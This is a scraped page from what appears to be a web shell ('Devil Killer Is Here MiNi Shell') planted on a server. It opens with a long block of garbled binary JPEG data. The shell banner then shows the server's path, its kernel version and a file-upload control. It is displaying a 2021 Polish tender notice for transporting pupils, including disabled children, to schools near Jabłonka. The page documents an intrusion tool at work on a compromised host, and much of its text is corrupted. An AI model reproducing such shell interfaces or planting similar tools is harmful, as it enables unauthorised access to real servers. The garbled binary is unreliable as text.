JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210723/0012535901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00125359 z dnia 2021-07-23</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczn. z terenu Gminy Jabłonka do Katolickiej Szk. Podst. ,<br/>Szkoły Specj. Przysp. do Pracy, Branż. Szk. I St. Specj. SPSK w<br/>Czerwiennem oraz SP Specj. Nr 9 w Nowym Targu w roku szk. 2021/2022 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Usług Wspólnych w Jabłonce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 492902313</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">3-go Maja 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jabłonka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-480</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">182511130</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@cuwjablonka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.cuwjablonka.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> obsługa administracyjna, finansowa i organizacyjna obsługiwanych jednostek oświatowych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczn. z terenu Gminy Jabłonka do Katolickiej Szk. Podst. ,<br/>Szkoły Specj. Przysp. do Pracy, Branż. Szk. I St. Specj. SPSK w<br/>Czerwiennem oraz SP Specj. Nr 9 w Nowym Targu w roku szk. 2021/2022 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7671472a-eb9d-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00125359</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002018/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Dowóz uczn. z terenu Gminy Jabłonka do Katolickiej Szk. Podst. , Szkoły Specj. Przysp. do Pracy, Branż. Szk. I St. Specj. SPSK w Czerwiennem oraz SP Specj. Nr 9 w Nowym Targu w roku szk. 2021/2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.cuwjablonka.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja pomiędzy<br/>zamawiającym a wykonawcami odbywa się przy użyciu następujących narzędzi:<br/>•miniPortaluhttps://miniportal.uzp.gov.pl/,<br/>•ePUAPuhttps://epuap.gov.pl/wps/portal Kontakt za pośrednictwem<br/>systemu ePUAP (w wyszukiwarce podmiotu należy wpisać "Centrum Usług Wspólnych").Elektroniczna<br/>skrzynka podawcza/Identyfikatoradresata:/CUWJablonka/domyslna<br/>• poczty elektronicznej: biuro@jablonka.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na platformie ePUAP.<br/>Wykonawca posiadający konto na platformie ePUAP ma dostęp do formularzy: złożenia, zmiany,<br/>wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>1.4 Wymagania techniczne i<br/>organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie<br/>korzystania z miniPortalu(https://miniportal.uzp.gov.pl) oraz Warunkach korzystania z elektronicznej<br/>platformy usług administracji publicznej (ePUAP).<br/>1.5 Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>1.6 Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz<br/>innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>1.7 Identyfikator postępowania dla danego postępowania o udzielenie zamówienia dostępne są na<br/>liście wszystkich postępowań na</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest Dyrektor Centrum Usług Wspólnych w Jabłonce,<br/>ul. 3 – go Maja 1, 34 – 480 Jabłonka;<br/>• Kontakt z inspektorem ochrony danych osobowych w Centrum Usług Wspólnych kontakt: e-mail:<br/>iod_cuw@jablonka.pl, telefon 18/2611153;<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego /dane identyfikujące postępowanie,<br/>np. nazwa, numer/ prowadzonym w trybie przetargu nieograniczonego nr CUW.26.5.2.2021 „Dowóz uczniów z terenu Gminy Jabłonka do Katolickiej Szkoły Podstawowej SPSK, Szkoły Specjalnej Przysposabiającej do Pracy SPSK, Branżowej Szkoły I Stopnia Specjalnej SPSK w Czerwiennem oraz Szkoły Podstawowej Specjalnej Nr 9 w Nowym Targu w Zespole Placówek Szkolno-Wychowawczo Opiekuńczych w Nowym Targu w roku szkolnym 2021/2022”.<br/>• odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. –<br/>Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.), dalej „ustawa Pzp”;<br/>• dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały okres obowiązywania umowy lub dłuższym, jeżeli wynika to<br/>z odrębnych przepisów; Okresy te dotyczą również Wykonawców, którzy złożyli oferty i nie zostały one<br/>uznane, jako najkorzystniejsze (nie zawarto z tymi Wykonawcami umowy).<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>• posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUW.26.5.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 112676,94 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1 „Dowóz uczniów z terenu Gminy Jabłonka do Katolickiej Szkoły Podstawowej SPSK, Szkoły Specjalnej Przysposabiającej do Pracy SPSK, Branżowej Szkoły I Stopnia Specjalnej SPSK w Czerwiennem <br/>w roku szkolnym 2021”<br/><br/>Wykaz przystanków:<br/>a) Lipnica Mała 536a i 259<br/>b) Zubrzyca Górna Zimna Dziura okolice domu 310a i 168 <br/>c) Orawka 115 oraz 179 <br/>d) Jabłonka „Za Górą” okolice ul. Uroczej, ul. Ks. F. Machaja, ul. Energetyków<br/>e) przystanek ostatni – Katolicka Szkoła Podstawowa w Czerwiennem SPSK, Szkoła Specjalna Przysposabiającej do Pracy SPSK w Czerwiennem oraz Branżowa Szkoły I Stopnia Specjalnej SPSK w Czerwiennem (Adres szkół 34-407 Czerwienne 245)<br/>f) do wykonania 2 kursy dziennie (1- rano, 1- popołudniu)<br/>g) 1 kurs około 73 km, szacunkowa ilość kilometrów dowozów w dniach nauki szkolnej – ok 146 km/dziennie x 186 dni = 27156,00 km<br/>d/ przewóz 12 uczniów (w tym 2 dzieci na wózkach inwalidzkich (rozłożonych). Pojazd do przewozu winien być wyposażony dodatkowo w urządzenie umożliwiające wprowadzenie wózka do pojazdu (platforma najazdowa) oraz mocowanie dla wózka na czas trwania przewozu) + 1 opiekun; wg harmonogramu zajęć lekcyjnych<br/>e/ dowóz uczniów na godz. 9.00, powrót między godz. 13.00-16.00 – zgodnie z harmonogramem zajęć lekcyjnych.<br/>Usługi przewozowe należy wykonywać zgodnie z ustalonym harmonogramem dostosowanym do planu nauczania danej placówki oświatowej. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 81428,94 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-06-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze najkorzystniejszej oferty będzie kierował się<br/>następującymi kryteriami:<br/>a) Kryterium „cena” (Kc) – 60 pkt<br/>b) Kryterium „czas podstawienia pojazdu zastępczego” (Kpz) – 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.2. Część nr 2 „Dowóz ucznia z terenu Gminy Jabłonka do Szkoły Podstawowej Specjalnej Nr 9 w Nowym Targu w Zespole Placówek Szkolno-Wychowawczo Opiekuńczych w Nowym Targu w roku szkolnym 2021/2022<br/><br/>Wykaz przystanków:<br/>a/ Jabłonka, ul. Potokowa<br/>b/przystanek ostatni Szkoła Podstawowa Specjalna Nr 9 w Nowym Targu w Zespole Placówek Szkolno-Wychowawczo Opiekuńczych w Nowym Targu (adres: 34-400 Nowy Targ, ul. Jana Pawła II 85)<br/>c) do wykonania 2 kursy dziennie (1- rano, 1- popołudniu)<br/>d) 1 kurs około 28 km, szacunkowa ilość kilometrów dowozów w dniach nauki szkolnej – ok 56 km/dziennie x 186 dni = 10 416,00 km<br/>e/ przewóz 1 ucznia + 1 opiekun<br/>f/ dowóz ucznia na godz. 8.00, powrót między godz. 13.00-16.00 – zgodnie z harmonogramem zajęć lekcyjnych.<br/>Usługi przewozowe należy wykonywać zgodnie z ustalonym harmonogramem dostosowanym do planu nauczania danej placówki oświatowej. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 31248,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-06-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze najkorzystniejszej oferty będzie kierował się<br/>następującymi kryteriami:<br/>a) Kryterium „cena” (Kc) – 60 pkt<br/>b) Kryterium „czas podstawienia pojazdu zastępczego” (Kpz) – 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów -<br/>Opis spełnienia warunków:<br/>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, iż posiada:<br/>- aktualną licencją na wykonywanie krajowego transportu drogowego osób.<br/>Informacje dodatkowe:<br/>- Wykonawca ma obowiązek posiadania stosownych zezwoleń, pozwoleń, zgód, zgłoszeń,<br/>koncesji, licencji itp. zwanych dalej „zezwoleniami” przez cały okres trwania umowy oraz ich<br/>okazywania Zamawiającemu na każde jego wezwanie. W przypadku, gdy którekolwiek z<br/>dotychczasowych zezwoleń wygasło lub zostało cofnięte w okresie obowiązywania niniejszej<br/>umowy, Wykonawca zobowiązany jest przedstawić nowe zezwolenie w tym zakresie, nie później<br/>niż w ostatnim dniu obowiązywania dotychczasowego.<br/>- Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 ustawy pzp, jest spełniony, jeżeli co najmniej<br/>jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia<br/>do prowadzenia określonej działalności gospodarczej lub zawodowej i realizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>W przypadku gdy, wykonawca ma siedzibę lub miejsce zamieszkania poza granicami<br/>Rzeczypospolitej Polskiej, zamawiający może żądać odpowiedniego zezwolenia, licencji,<br/>koncesji lub wpisu do rejestru działalności regulowanej, jeżeli ich posiadanie jest niezbędne do<br/>świadczenia określonych usług w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">3.1. 1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji - w<br/>celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia w<br/>okolicznościach, o których mowa w art. 109 ust. 1 pkt 4 ustawy Pzp;<br/>- chyba że Wykonawca w Formularzu Oferty lub oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy<br/>Pzp, wskaże dane umożliwiające dostęp do tych dokumentów samodzielnie przez Zamawiającego,<br/>poprzez bezpłatne i ogólnodostępne bazy danych;<br/>Dotyczy również wszystkich wykonawców wspólnie ubiegających o zamówienie, jak również w<br/>odniesieniu do podmiotów udostępniających zasoby<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.<br/>Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich złożenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania 